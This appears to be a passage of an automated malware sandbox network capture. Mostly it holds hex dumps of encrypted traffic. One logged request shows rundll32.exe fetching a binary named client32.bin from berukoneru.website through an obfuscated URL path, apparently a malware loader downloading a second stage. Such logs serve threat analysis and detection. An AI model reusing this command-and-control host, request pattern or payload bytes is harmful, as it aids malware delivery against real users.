                            2021-12-14 09:21:39 UTC483INData Raw: 06 de ca b6 3b 58 d5 62 cc 8a fb 45 76 21 95 c0 b7 2c 97 8f 7a 17 6a ac dd 76 32 14 48 19 d0 f7 c1 ee d3 57 60 bd a5 93 62 80 9a af 88 21 6c f2 8b 96 f0 d2 d3 34 b0 93 6b e1 52 c5 e0 b9 09 dc 24 7a bd f8 df 67 a9 25 54 e7 de 5c 27 67 d5 fa 59 28 f5 37 6f d4 a7 77 ef 33 f7 a0 57 23 35 bf 1f 26 2f 21 24 2e ac 08 73 bb a6 cc 3e d8 4b 4b fb c3 f7 81 12 0a 84 64 e0 0f 53 9a 23 a7 71 ae d5 f0 ee 0d 75 e0 23 cf 60 07 52 87 2c 23 56 b9 be df 5e 73 1f 46 f8 26 c6 6e c1 c4 ac a0 81 94 36 a2 86 82 0a fc c3 93 e8 ec e7 f6 54 24 ad 75 ad b1 8e ee ec a4 90 7d ee 8b 09 c2 b8 57 51 ba b0 ea 34 67 e2 87 bf 0c 2d 47 77 a1 62 67 a6 0c 1b a3 9e 8c 2f f0 90 c7 cd 2d ac 34 88 21 79 00 a9 d9 15 ae 14 e7 9c 74 d0 c8 de e0 b0 7e 94 ae f8 af a3 a6 cd cc a7 9f f4 c4 d3 b0 23 7c 41
                            Data Ascii: ;XbEv!,zjv2HW`b!l4kR$zg%T\'gY(7ow3W#5&/!$.s>KKdS#qu#`R,#V^sF&n6T$u}WQ4g-Gwbg/-4!yt~#|A
                            2021-12-14 09:21:39 UTC499INData Raw: 1a 8b 8a c2 67 70 7e 71 54 68 79 73 a5 4e ab e3 4a b0 c0 35 cc 84 e5 09 8a 2d d4 b3 61 5c 7c a2 69 40 6d 93 fe 19 95 f1 37 72 e3 a4 cc e1 46 00 36 ad 08 70 09 48 ee df 28 59 f1 dc 84 d8 a6 88 9b 81 17 8e ac 5a 38 1e e3 b0 2c 58 88 bc 3c cc a0 d1 3f c9 e2 cd 71 82 5a a1 c4 49 0c ab e1 5d d1 4f 54 3c 7d a2 ed c9 e0 f5 88 65 0a 91 c0 51 f6 39 73 4c 95 3f e6 b4 ce f9 ff 68 3d da 15 d4 a3 b5 3e 9b f4 35 b5 15 04 36 86 d2 ec 26 ef ad 43 d2 da 21 a2 d9 f4 d3 7e 4c 68 aa bd 8e 8c d2 db 21 9d 03 68 fe f0 e3 c2 17 82 dc 14 81 fc 68 d1 32 7e 48 88 4d 6d a1 89 03 19 4f 65 74 d5 22 c5 7b 46 5c 8e e0 12 37 09 9f 86 e4 8c 00 7a 9c 9e 4c 98 c5 39 45 26 d1 e9 44 94 ff c8 ca 5c a2 f4 33 0d 2a aa 1f d3 4c 1c 0c 3f f3 08 7b a3 eb 7b e7 59 b5 5b bf cb 25 9b 11 72 93 d9 2d e6
                            Data Ascii: gp~qThysNJ5-a\|i@m7rF6pH(YZ8,X<?qZI]OT<}eQ9sL?h=>56&C!~Lh!hh2~HMmOet"{F\7zL9E&D\3*L?{{Y[%r-
                            2021-12-14 09:21:39 UTC515INData Raw: 33 c3 d5 ab 38 83 31 57 4d b0 0c 3c fc 3e 4f d3 9b 72 a3 e4 0c 6c 08 2f ff a4 6c 6a df b6 8c 7b 24 68 b0 0e d2 05 e2 f9 41 46 ca 15 b9 b7 02 0c e3 58 ba 11 31 8b ba 02 3a 0c 84 d5 36 ab 65 24 1f f9 e2 0f 83 47 9a 22 6f 31 de 9f 0f 48 b3 c9 db f9 ab 1d 27 e9 c5 83 98 15 d7 6c 93 b7 0e ed 5f c9 d9 03 df 84 ce 07 03 28 39 eb db c4 21 50 9c 97 90 2c 76 af c5 99 4a 54 f4 ba 0b 5d 24 61 50 81 c0 d8 7d 07 a2 e1 6b 26 5f 8b 7c 88 95 2c 76 4f d0 70 dd 80 88 86 50 b0 40 ad 95 3b 12 bc 72 7c d5 0a 64 6a 9b 5a 3c f4 3f 02 57 75 f9 dc 0a 2e ff 75 10 53 d2 85 61 8f 3f 50 d0 35 57 1d 0c 50 9d e4 f5 fd 6c 84 5d 36 96 76 96 d2 ff 6f b3 fd 55 53 1a c3 bf 4b b6 27 2d e6 3c 55 80 81 fc 5e 8c 97 1a f2 df 24 a3 b6 a9 d1 ef 67 e5 8d 7a 95 79 f4 9d 6e 17 78 d6 28 d0 4a 03 fb b4
                            Data Ascii: 381WM<>Orl/lj{$hAFX1:6e$G"o1H'l_(9!P,vJT]$aP}k&_|,vOpP@;r|djZ<?Wu.uSa?P5WPl]6voUSK'-<U^$gzynx(J
                            2021-12-14 09:21:39 UTC531INData Raw: 36 0c 6a 47 30 19 9c 4e 22 85 cb 33 b8 3c 86 72 6e eb c2 7f 61 f3 63 c9 32 ed 9a 6c 4e 71 21 a3 96 09 5b 1b f6 91 d8 af 7f 12 2f 29 bb 70 ab 1e 8f 4e 86 79 ad f6 43 a3 93 18 7d 1f cd c9 74 b0 36 46 e2 59 f2 66 4d 73 8d 51 79 81 72 ed e3 8b 3b 3c f9 23 bf 04 38 63 7f ed 81 2c 3c 66 e8 4d 85 47 dd da 40 0d f8 54 73 09 8e e5 8d 8d 56 86 3b 42 a5 20 c3 4d 3d 63 e6 81 2e d5 06 d0 40 d4 9b 0d 1b 77 b1 b5 59 66 f4 f3 d3 f0 a4 6a 03 8b d6 85 61 23 74 bb b4 54 a1 fa 5a 96 88 0d 48 0c 10 fc a7 55 bb fe 20 0d e3 f2 af 1a c5 61 fe 3f d1 72 04 af a2 d5 4c 24 76 71 d3 2c 1d 01 cc 92 44 5b b1 61 ea 2f e9 d5 61 5a c7 1d 6f 06 ad 68 4f d1 aa c8 64 89 7c 2f a9 56 0d 9e 5a 98 51 aa 2c 0b 5d 83 9b 9f 16 c2 e5 71 51 02 ea cc 84 39 90 e7 3b ce f7 eb ee e7 16 20 5a 10 d9 b7 22
                            Data Ascii: 6jG0N"3<rnac2lNq![/)pNyC}t6FYfMsQyr;<#8c,<fMG@TsV;B M=c.@wYfja#tTZHU a?rL$vq,D[a/aZohOd|/VZQ,]qQ9; Z"
                            2021-12-14 09:21:39 UTC547INData Raw: f2 e5 3a cd 32 2d ed 92 9d 3f 9d f5 64 8d 06 c5 e4 93 7f 3e 78 36 95 1c 30 12 88 9a 97 7e 9b 10 03 a4 d9 d5 b1 65 9e 77 c5 87 e2 43 68 be db 1f 8e 2e a5 55 62 3c ec df 5b 5e a5 61 b7 69 0c ae ee 83 66 7a f5 00 74 70 c2 44 a6 a0 92 0c 66 fa b1 20 92 77 bf 47 29 d0 51 4a 32 10 65 09 54 81 4f ca 93 25 3b c8 e6 6b f3 3d 7d 97 d1 00 ae 70 9d 06 59 3e 67 79 35 74 ea a1 ac 3c 5d 64 44 b3 02 ea 1a ec 16 0e 15 85 65 8c 11 2a 09 43 5a ad 8a 26 10 f6 44 b8 5c 39 ac e8 dc 38 55 3d 16 98 7a 7d 69 fb c6 57 64 49 89 04 01 eb bc 13 9b d2 51 58 5b b1 c4 77 7c 6c b9 4d 8e af 08 97 af 13 96 8a 13 dc 5b 85 ee 1d d9 f1 cb 2e 8d 50 2f 90 1a 74 47 9d 82 de ef bb d5 4b 2a 1c 36 7f f6 20 e8 e6 00 2f 63 53 d2 32 c8 6f 20 15 e4 5b ee d7 c5 b4 29 0f ad c9 4a db d2 7e b9 b1 d9 bf 4a
                            Data Ascii: :2-?d>x60~ewCh.Ub<[^aifztpDf wG)QJ2eTO%;k=}pY>gy5t<]dDe*CZ&D\98U=z}iWdIQX[w|lM[.P/tGK*6 /cS2o [)J~J
                            2021-12-14 09:21:39 UTC563INData Raw: 20 73 2e 57 0e da 3c 5f 79 54 cf f8 d9 3a ac c6 dd 9b d7 a4 39 61 8d 95 a4 49 72 7c 27 f5 8b 31 15 bb b1 a4 98 cd 3b 78 40 00 11 29 d8 f3 40 3f e5 24 c7 d0 44 db 15 b8 d0 20 72 e0 9d 97 4a eb ec 4c 78 60 b4 20 69 c7 26 d6 35 1e de 8d c2 21 c5 97 6d 4b a5 c3 49 16 5b d8 a6 e0 0f f2 84 9c d1 79 c0 82 53 97 59 e0 08 c2 cf 30 12 b5 5c 01 b9 dd c2 ee c3 36 24 f8 c7 cb e1 8a c7 fc 03 78 4b 1d ee 0a 44 0a 49 e0 cf 70 92 83 7c e4 ea 46 eb b2 dd eb 84 d1 99 14 0d de f8 64 26 f1 4b 89 99 b9 8e 38 6f 50 7d c3 4d a3 5a 10 f5 76 a0 20 0d 92 21 d1 72 f9 e7 a4 63 ff d0 b6 6b 3d b8 b2 cb 9f 53 83 29 ca db b3 aa f0 99 4c c0 77 df 06 d3 91 a4 f3 f3 97 a2 4b d3 ef 25 5c 44 cb 53 4b 0c 61 51 72 38 97 7d aa 8f 25 bb 4f 4d e7 f3 1b 93 67 be 35 a7 6d 10 26 d0 e9 75 49 03 9b fe
                            Data Ascii: s.W<_yT:9aIr|'1;x@)@?$D rJLx` i&5!mKI[ySY0\6$xKDIp|Fd&K8oP}MZv !rck=S)LwK%\DSKaQr8}%OMg5m&uI
                            2021-12-14 09:21:39 UTC579INData Raw: 36 19 cd 54 79 36 2b 6b 10 11 75 b0 3e 40 37 97 94 7d b3 d1 b3 ee 09 71 72 a8 16 9f 4c 06 27 52 09 90 a7 65 25 a4 a4 57 68 42 27 dd 6a 76 21 5f b3 5f 82 fe 88 df 67 74 1f 96 b4 23 a0 83 08 c2 ae 2d 1b fc ae e5 20 42 94 8a d8 7b d9 9b cf c3 7d 90 4b c0 21 97 33 34 d0 18 df fd d8 62 17 9d 9f 04 23 01 17 72 ad d8 e3 c8 36 ab ab 9c 6d a6 22 8a 34 fe 50 67 53 c5 95 c5 00 5e 38 04 78 1c ea fa f3 22 1e 4b 90 85 1f bb 19 f3 e4 1a 2e 5a d5 ee 09 ea 8a 92 12 37 4d 76 8c 5e 86 9a f6 0f 83 42 3d 9c 00 f1 3f 0a b2 7c 5a 8b 07 84 14 3c ee 7d ba 94 3d 04 25 74 dd 76 52 55 08 a3 7a 93 c7 7a 1d ab 8d 97 0e 87 eb b0 78 a9 b1 ef 0f 66 80 8a a6 12 cd 21 8a d8 66 2c bb 2d 78 c2 f3 b8 a0 53 6a 08 0a 6f d7 94 8a 1c 08 1b f7 0c 22 8d 33 21 1c 41 72 82 67 54 6c 50 cb 57 a0 17 74
                            Data Ascii: 6Ty6+ku>@7}qrL'Re%WhB'jv!__gt#- B{}K!34b#r6m"4PgS^8x"K.Z7Mv^B=?|Z<}=%tvRUzzxf!f,-xSjo"3!ArgTlPWt
                            2021-12-14 09:21:39 UTC595INData Raw: 0e 82 3b 28 5c 8a 23 f3 fe ac ea 89 97 4f fd 45 07 36 35 55 85 5f e4 c1 68 4d fa b0 54 a3 22 04 98 4f c7 b5 8d 23 7d b2 61 b6 31 34 20 b7 1b a4 d9 42 0b 7e 84 3a ce e7 2c 38 36 17 77 e7 e4 fc 2c 65 16 40 a0 54 34 a1 13 8a 38 48 80 ff 35 49 57 af 87 44 9a 1f fc e5 4c 13 ed 3a 2b e0 e7 ce 29 ed f9 71 81 2e b2 3f 69 f0 38 cd 38 b1 59 2a 92 fb 5c 83 29 11 0a e0 7b 1c 3f d2 c4 55 e4 71 e3 3c b5 7d 97 37 f4 89 35 3e 2a 90 9a 16 31 29 0e b4 2a 40 26 4c aa 45 d5 c7 d8 27 6a 16 b1 9a 67 61 41 a1 1a ba 9f 70 6e 9e e9 48 f7 c2 cc 52 c9 00 75 56 16 a2 d2 83 54 8f f5 d3 27 87 8d e6 67 d7 b0 37 8c b1 38 87 6b 58 e8 12 fe ec 00 2d fd 70 73 31 4e 6a 42 32 85 39 f6 e8 5b 9a 34 07 d7 bd 73 ea cc e2 da f0 8c 8d 5c ca 99 14 9d fd ba a1 e0 ed 4d 03 be 96 69 17 e0 56 c7 1f 7f
                            Data Ascii: ;(\#OE65U_hMT"O#}a14 B~:,86w,e@T48H5IWDL:+)q.?i88Y*\){?Uq<}75>*1)*@&LE'jgaApnHRuVT'g78kX-ps1NjB29[4s\MiV
                            2021-12-14 09:21:39 UTC611INData Raw: a0 19 9a db e6 23 d3 03 86 6f 75 af 47 d5 3f 20 85 14 19 0e b9 d4 63 8c fd 8a 9a af a9 f6 65 42 84 ce cc f3 73 04 88 70 20 03 2e 2d 3a f5 0f cf 45 fe 85 b5 60 0f 38 e4 0f 37 bc bf 4d f6 2c 45 a8 31 d4 65 37 db a7 ee c6 e6 95 0e bc 4a 8a 34 9d a4 0d 59 51 52 14 5c c1 0f 3c ec 47 b1 68 4c 80 4c 71 0c 20 bb b6 5b 7b d7 49 8d 03 7d d5 bb ae cc 8b d0 d0 02 e9 5a 65 53 ae 1e 2c a6 43 6e e2 1e c5 78 ff 67 8f f0 0d d1 d9 1e 13 2c a2 1d df 57 0b e7 72 4f c1 4e fd ee 99 04 21 c1 02 12 96 53 77 8d aa 83 93 27 ff a3 34 86 54 2e 18 ab 65 1d 56 65 e7 f0 fa 9f 11 fb 79 79 cc 44 ad 4a 13 67 7c 78 91 1b 35 3c f6 1d 35 63 f5 35 af 82 78 1c 11 a5 0d 76 24 5c 35 8e 9a 62 ca eb d1 dc 7d 1a a1 82 c4 f1 29 ea 1f 1c 46 3e 42 d1 69 f2 f0 01 dd e9 6b 1b 07 ff 17 68 ac d1 b5 48 8c
                            Data Ascii: #ouG? ceBsp .-:E`87M,E1e7J4YQR\<GhLLq [{I}ZeS,Cnxg,WrON!Sw'4T.eVeyyDJg|x5<5c5xv$\5b})F>BikhH
                            2021-12-14 09:21:39 UTC627INData Raw: 15 93 b0 c9 e5 45 68 a6 ac b4 73 14 04 8b d2 73 37 da 94 58 af 8c 71 a1 da 98 2f 7a 5f 00 68 57 45 4d 6b 23 a3 df ac b7 08 22 c0 21 92 9d 91 8b 92 62 0b c1 a4 d9 31 21 b2 82 fc 16 c3 c2 2c e6 f2 c9 7b 9e ed 62 e8 b1 c5 94 41 f1 99 7a db 30 24 96 ba 10 ac d7 87 21 08 bd c6 d3 02 47 9e 4d 19 3c 56 18 b8 86 af af 82 b6 d8 04 fc 7b 26 3f 88 0f 78 4b de 4d cd 3d 2d 67 48 53 e0 e8 f4 57 ba fb ab 11 65 6b 3f 5a 74 66 d8 6f cd a5 55 54 84 d7 84 2a 96 f0 7b ba fb 3a 40 ae 9a 7e 21 6d 09 fa 90 30 cc af f9 65 a6 50 8e 9b d2 63 fb a0 1f ac 48 d8 90 99 cc 91 db b9 d3 5a f0 df 5d f6 67 0a fc a1 83 ac 70 74 61 2d 1d 54 6f de e8 e2 75 10 9c ed a3 3d b9 89 38 fd 44 93 dc bb be 2a ee 11 5f 06 2e 3b 9d 7d 2a 31 15 93 0e c2 16 3f a1 08 92 6c 38 1e dc 9a b9 14 3b 62 e8 ab b8
                            Data Ascii: Ehss7Xq/z_hWEMk#"!b1!,{bAz0$!GM<V{&?xKM=-gHSWek?ZtfoUT*{:@~!m0ePcHZ]gpta-Tou=8D*_.;}*1?l8;b


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            3192.168.2.64981579.110.52.144443C:\Windows\SysWOW64\rundll32.exe
                            TimestampkBytes transferredDirectionData
                            2021-12-14 09:21:39 UTC595OUTGET /tire/qmvui3Jef80_2BIeM_2BXh/O_2By54KPinsD/_2BFfpah/5k89w5bXqU7DEWhQp1iBEy2/_2BnU_2FsR/sUo3C8aISdxyIYl8W/JynqV_2BmddH/AgiN2_2BUrO/VCPQbezXreMebQ/izeoYIW_2BTEh6B2Zh_2B/L3PgbMDpsuFq53n5/obVS_2BHmsXbkex/IxU7ONkaq6S5id4E4C/VTSP2pp87/7bclEnvP5UuFRz5_2FIN/q_2FKVUn/a3U.eta HTTP/1.1
                            Cache-Control: no-cache
                            Connection: Keep-Alive
                            Pragma: no-cache
                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                            Host: berukoneru.website
                            2021-12-14 09:21:39 UTC629INHTTP/1.1 200 OK
                            Server: nginx/1.20.1
                            Date: Tue, 14 Dec 2021 09:21:39 GMT
                            Content-Type: application/zip
                            Content-Length: 268426
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Set-Cookie: PHPSESSID=56h97hrongb1tcobt3aqjld9k2; path=/; domain=.berukoneru.website
                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                            Cache-Control: public
                            Pragma: no-cache
                            Set-Cookie: lang=en; expires=Thu, 13-Jan-2022 09:21:39 GMT; path=/
                            Content-Transfer-Encoding: Binary
                            Content-Disposition: attachment; filename=client32.bin
                            2021-12-14 09:21:39 UTC629INData Raw: 58 1b 91 63 b8 aa 05 14 26 b5 4a 87 75 c1 a0 26 9e 3c 11 6e 71 42 96 26 99 7a 08 52 54 2f 31 7f 58 90 87 ef 21 eb 4d ac aa 62 d0 f5 9e 65 dd b1 86 a9 14 c8 ae 98 d4 b6 d6 60 d1 47 77 cd be 8c 6e b1 66 d1 e8 7a 10 1e c8 8c 97 db c5 0f 0b 40 05 e7 84 c2 c8 34 df 33 e6 dc 52 e3 46 f4 95 b7 af 93 01 65 a9 71 60 bf 1f 51 95 4a f0 de 35 3e 05 cd 02 6e e9 85 80 bb d0 9e 8a 75 b1 3b 1e 78 47 1f 6b 12 e2 6d 4a 11 60 95 cc b0 70 f1 9e 77 55 2f 09 91 10 e8 d7 e3 05 c1 1d c9 ea 2f 96 3d 82 e8 0e ae b5 77 75 a5 0d bc 2f f1 b6 c5 47 94 e1 2d 77 eb d0 a1 8b a7 ad 18 90 fa 77 82 10 81 a4 59 32 4a 80 82 20 cd 7d 1d 20 6f 17 d7 8e 41 9a d0 fb 32 98 6c 3b da 81 8e 51 5e cb e0 92 a7 47 9a 9d c8 4d ed 20 99 cb 03 c1 2b 49 00 fa b7 08 c4 02 c1 94 c4 b3 eb 0b 87 5e bf 36 f0 75
                            Data Ascii: Xc&Ju&<nqB&zRT/1X!Mbe`Gwnfz@43RFeq`QJ5>nu;xGkmJ`pwU//=wu/G-wwY2J } oA2l;Q^GM +I^6u
                            2021-12-14 09:21:39 UTC645INData Raw: 53 07 cb b8 4e 62 9c b0 52 21 3d c4 3d 76 91 43 af 38 7c 50 14 41 e7 bd 39 dd 41 f5 8b 56 ab fc e5 6d c6 be ea b9 6f ac 49 c3 e4 fc 2c 2e 24 77 88 18 d0 d6 0d e2 48 70 d9 46 b0 89 af 38 9c 24 3c b1 b0 63 e5 b0 08 90 17 71 54 ef f8 87 9d 1e 42 a7 fd 9a 63 c3 82 40 5b b8 56 fe 88 58 4d 03 7b 4a c1 3e 01 55 8d a2 04 94 51 bf c3 70 6b d2 e2 08 64 3d df 31 53 f8 f6 69 5e 2b 60 1e 2f 64 eb a0 41 2e cb 53 06 1f a2 63 54 77 f5 61 29 3a 5a fb 59 8c ff 2a c8 82 0d 0a b0 a7 75 fb 71 92 04 b8 69 03 b4 45 51 d3 95 71 f0 db 15 b4 fb c5 0d 33 ef a0 0b 56 c4 42 43 9e a7 a1 d1 7f 09 fe c9 cc 52 6e cb 80 08 2a 8e a8 9e fd e5 c4 23 ad ed bd 3e 84 71 6f 32 b7 23 76 bd f0 aa 04 aa 58 67 b0 ae 2d e0 9e 97 be 39 61 1a 42 24 de 9f 09 a5 12 54 85 a1 89 71 fa a7 21 f9 6e ff 48 25
                            Data Ascii: SNbR!==vC8|PA9AVmoI,.$wHpF8$<cqTBc@[VXM{J>UQpkd=1Si^+`/dA.ScTwa):ZY*uqiEQq3VBCRn*#>qo2#vXg-9aB$Tq!nH%
                            2021-12-14 09:21:39 UTC661INData Raw: e7 b0 40 b0 31 3b 8f 49 34 9e 9d 07 a7 2a 47 1a 98 b8 bb ef 61 5f ed 3e 4c 3b 59 ec 5e 3a 76 d9 c1 67 5c 2e 34 de 0d 85 63 85 90 eb e4 ee a5 b8 ce e5 27 ab ed f1 46 e0 2a 79 16 27 a9 fc b8 cf 65 bb bf d4 90 e2 e0 3c 0b de e6 54 f2 ef 2e be 6b fc 2c 61 d4 bc bc 78 9e 57 3a 13 f3 b3 15 e0 74 c2 74 c3 e1 7a b9 e4 c1 3b 07 41 66 37 d9 18 e3 65 ba 35 bd 4f 40 fc 90 eb c9 45 3c ed ba 8f 96 10 0b e4 14 da a9 b8 8c 11 b2 96 cf a0 6d af e4 4f c4 a4 69 fd f3 64 92 ef 16 b1 cf c1 d4 e9 4f 21 c8 1b 40 8e f5 06 bb 3f a1 f0 76 28 07 ee 59 f8 cd 20 06 01 fd e9 a0 fc 2d ee dc 88 96 0b 46 af a1 33 eb a0 c7 4e a9 5c 03 33 28 8c ca 8f d8 6c 19 1d 8f 80 97 7e b9 38 71 06 4f 9b c4 2d f9 c3 af 26 49 23 e0 0a 10 0e 09 e0 18 f6 ae d4 cb 86 15 1d 08 c5 ff e8 8d 3d 16 53 16 b4 c9
                            Data Ascii: @1;I4*Ga_>L;Y^:vg\.4c'F*y'e<T.k,axW:ttz;Af7e5O@E<mOidO!@?v(Y -F3N\3(l~8qO-&I#=S
                            2021-12-14 09:21:39 UTC677INData Raw: 45 db 6c 2a 63 aa 06 70 d0 6b 08 5b 47 fa c5 46 f3 38 99 a1 5d cc ba 11 e3 7e a5 1e 73 fb a9 d1 cb a2 38 03 98 b3 a6 13 bd fa 0c bd cb 3d 30 a4 92 94 e1 ea ba 97 05 66 b9 79 98 c6 56 aa 73 54 58 3d c0 60 d7 30 76 6d 4f e1 cb d0 a7 7b 54 a9 1f f1 d3 15 64 69 54 3b 42 6f a0 02 ae 6e 26 9b 48 e2 07 8c cb 20 9e b8 e7 5f b5 44 63 51 8f cc 68 40 45 da 42 e1 26 c3 48 56 35 4f 6e c9 96 89 0c c7 f1 ba 24 ba 83 f0 45 05 98 ec 4a 92 f6 f3 44 8a 27 ff 23 80 ae 70 e7 ea 9f cb 0a ab 3f 5e 7f 1f 38 05 43 d0 fd 66 cf ed 46 fd dc 7c 23 bc bd 8c 68 7d 4d 99 6f e0 32 34 87 aa c5 a8 35 09 d2 c7 60 38 ac 2d 95 b3 ee 1f c1 52 22 e6 12 b0 07 3f a8 53 75 fa ff cb b8 9a ac c4 ce 88 1b 59 1d 72 ab a4 6b 2b 17 94 74 4b 8e 70 9e 76 ff 8b 6c 0c 30 0b 09 54 f3 70 a5 8a aa 43 01 be 96
                            Data Ascii: El*cpk[GF8]~s8=0fyVsTX=`0vmO{TdiT;Bon&H _DcQh@EB&HV5On$EJD'#p?^8CfF|#h}Mo245`8-R"?SuYrk+tKpvl0TpC
                            2021-12-14 09:21:39 UTC693INData Raw: b9 b3 89 36 a0 10 70 11 ee 76 04 aa f4 39 8a 26 d4 29 d7 d0 ba bb d2 9e ff 36 cc f6 8b 3a 1a f6 f1 07 b3 88 26 61 19 fa 05 f4 86 56 44 b7 bb d2 49 24 96 90 b9 8d a7 e0 88 c2 e4 b3 80 23 5a 22 bf 34 49 c2 2b 10 c7 df 0e e7 7d b2 2c 46 10 12 fa 63 8d 6c 77 94 24 a1 1f 78 d0 cc 65 5b 7c 8a d7 ba 5e 54 fe e7 bf a4 3a f2 31 5a 79 3e a4 48 aa 3d d5 6a ee a2 62 1e 62 a8 4c 65 ce 69 6b 81 6e e1 9e 3c 50 8d 5b bf 47 41 9f a8 b8 98 6f 92 de 70 83 81 ea ef e4 df c4 31 d6 84 a7 5d 99 6f 78 56 b8 1c f8 44 db b5 1d a0 95 e6 0c 26 aa 44 86 22 aa 52 ae 80 ee f4 41 9c 26 7c 67 ed a8 4e 37 b5 7e f6 f0 ea ce 5f c5 06 cb 55 9c 65 9e c7 e8 00 a6 00 43 1a f8 e2 6f 8e 1e 8c 65 88 0b 33 05 85 4a 32 5e 64 82 e4 67 70 43 e5 fc d0 07 dd 85 66 6d 6b 0c 68 07 1f 46 f8 ba c6 55 80 cf
                            Data Ascii: 6pv9&)6:&aVDI$#Z"4I+},Fclw$xe[|^T:1Zy>H=jbbLeikn<P[GAop1]oxVD&D"RA&|gN7~_UeCoe3J2^dgpCfmkhFU
                            2021-12-14 09:21:39 UTC709INData Raw: 78 71 76 31 33 bc b7 0d c3 de 27 b9 e0 41 88 eb d3 68 96 04 e0 a3 0b 36 53 fd 2a 4d 2f 82 25 1c 70 e4 3f df 1e b6 ee 36 26 e8 83 d9 db 55 4a 5f 9e fb 35 bd 90 d8 cf e2 60 85 21 8a ca e3 72 a8 a1 08 41 78 fc 7c 2c 27 f4 20 a9 b9 fd 24 f1 24 3f fe 94 22 1f 4a a2 89 18 ac ac 87 3a b3 37 10 5d f7 83 1a 75 a9 ca d7 19 08 20 be 46 78 23 ed 7e 89 c7 b2 59 87 53 ec 33 70 85 97 13 b5 7b 44 20 9b 67 94 ea 69 ac ac 4d db 54 a3 61 cf a9 0d d8 10 67 82 3d 2b d5 9c 21 be 3f e2 16 18 9d e4 78 52 a4 7d c6 8a 77 73 ce 0f b4 37 7f ca a5 b1 be 65 af f7 f4 af 6b a3 bd c2 a1 b2 f9 52 59 8c bd d6 6d 1b 49 59 57 cb 23 8f 9f cb 4a a3 12 7c 63 ae 4c d0 f6 f5 da 3d f5 51 94 3f bb e3 b9 56 cd 1e 4a 19 99 fa 31 9b a4 51 ac 78 89 24 c2 e1 9f c5 ab 4d 38 7d 98 e0 38 fc 6d fb 7f d9 88
                            Data Ascii: xqv13'Ah6S*M/%p?6&UJ_5`!rAx|,' $$?"J:7]u Fx#~YS3p{D giMTag=+!?xR}ws7ekRYmIYW#J|cL=Q?VJ1Qx$M8}8m
                            2021-12-14 09:21:39 UTC725INData Raw: b4 60 44 97 27 1f 21 1f d0 2f ee 48 10 3e c5 6c 33 ba ab 56 30 71 11 00 92 c5 c1 bc 66 45 ac 84 d1 09 08 c1 a4 6e fa a9 3d bd 53 ba 60 d9 86 1f 61 02 41 f1 b4 f1 a3 4e 1f fb 49 76 1a 69 04 18 96 d5 40 41 0f 01 30 43 c5 3a 64 c0 69 40 59 d0 79 72 63 bf 4e b6 d6 5f 07 58 61 f7 90 a4 f9 08 c9 da 62 84 96 47 39 af 7a 24 a8 3f 44 47 80 46 6e 86 1b c4 f1 8b 20 c8 b5 ff 9d 59 83 72 67 dc 53 42 27 f8 dd 5c f8 ec 3f f3 9d df 40 c3 59 19 b9 61 5d 0a d0 76 4a ba fe cb 76 15 05 42 32 43 76 df 71 a5 91 73 4c 46 d6 87 eb c9 66 a6 96 7b 6d fe f6 ca de ff 88 d0 f6 e9 f5 04 48 89 18 70 91 a4 2b 83 db 4b d3 1c 1c f5 ba 0f d9 39 57 5a 1f 17 c4 00 79 61 af a5 a6 0e a0 e8 de a4 96 86 bf bd 5b f9 2d 27 92 80 fe 63 93 0c b5 49 f5 38 79 ac 61 63 9c 01 f1 ee df 76 f8 e5 83 7e 57
                            Data Ascii: `D'!/H>l3V0qfEn=S`aANIvi@A0C:di@YyrcN_XabG9z$?DGFn YrgSB'\?@Ya]vJvB2CvqsLFf{mHp+K9WZya[-'cI8yacv~W
                            2021-12-14 09:21:39 UTC741INData Raw: c6 16 99 f3 a4 fe 24 ea 90 c4 e0 29 ca cb 52 bf 65 c0 7a cb 51 b2 b2 b7 57 79 73 38 52 ba 5a bc 4c 22 40 1d 19 b5 1c 82 37 66 72 7a 08 22 07 27 40 84 8b 5e f6 28 53 e6 b4 ec 9b 67 a1 a7 03 8f 6c 4a 4d 12 c3 da 7e a8 53 51 f8 cd 89 8c b9 52 85 a1 d8 01 df 09 06 ee 13 00 0e a7 70 26 89 41 da 6d fb db 2f af 16 ad 02 d5 29 0a 4e cf c2 35 b6 0a 26 11 b4 f5 f2 82 4b dd b8 84 a8 aa 2a c9 ca 48 c4 34 61 bb 76 c0 de cb 0c 5c 8b c7 9f 3b 49 17 4c f5 8b dd 7a c1 0b 4a 35 d0 be ab f7 e6 a7 43 03 6e 29 c7 df 2d b0 79 31 f8 86 19 32 81 8e e0 4f 45 87 07 89 46 26 9a 65 b3 76 6f 12 77 fd 5d b6 98 f7 39 4f 6f 57 e1 a1 da 5f 6b 71 53 ad f0 06 c4 15 97 4e 02 e0 c3 33 22 01 d7 19 f4 6f 3d de 8d d9 4c 13 c8 e0 95 12 74 55 73 72 a5 5f 83 9d 74 b1 5b d4 c0 73 ee 7d 1f bf 73 a7
                            Data Ascii: $)RezQWys8RZL"@7frz"'@^(SglJM~SQRp&Am/)N5&K*H4av\;ILzJ5Cn)-y12OEF&evow]9OoW_kqSN3"o=LtUsr_t[s}s
                            2021-12-14 09:21:39 UTC757INData Raw: 8a 95 bf 32 84 5e 76 15 88 cd 1f 9d d9 af 1b 24 c9 22 47 79 35 37 09 c6 d8 7e 27 47 2e 10 a1 b3 5b 24 c7 aa a8 03 00 c5 f4 aa 54 55 49 85 5b 49 b2 cc a2 5a ff 21 cd f5 b2 48 99 9f 29 da 5e f5 ee 59 21 b3 7a 12 71 e8 77 cd 3b 1f a7 84 6b dd 6e 75 68 60 c1 ea 3c c3 d4 41 9a fe ae e6 34 bc 08 a1 46 64 26 66 4c 90 ed 50 d9 be c6 d5 7a 2c d9 b2 5a e4 f8 f8 8d 45 b3 2c 15 2c ad de c1 5a fd 4e 28 de 6a e9 ff c0 fd 35 e9 57 90 7c 6b b6 ea 1a 5a b1 76 15 34 93 69 f2 35 55 5a 0b 18 cd 6c f7 aa 27 6d 48 5c c9 9a d8 8f 58 c3 f7 bc bc 0f 9b 2c 71 e8 01 14 70 24 ed 50 5c 6f f5 1e b0 11 fd 45 15 69 45 3d 3a f5 85 b8 64 94 bb 5e 33 9c 63 8a 60 52 7f 2f 5d 5f e7 5b 8a 81 02 98 a6 97 ae 88 75 55 72 18 63 80 fc da 9e 79 b4 4f db e3 38 dd 8a df 4f ca 3f 74 56 fe 61 02 7f 87
